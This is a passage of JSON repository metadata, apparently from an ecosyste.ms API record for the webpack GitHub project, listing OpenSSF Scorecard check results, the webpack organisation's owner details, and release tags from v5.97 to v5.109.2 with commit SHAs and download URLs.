pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f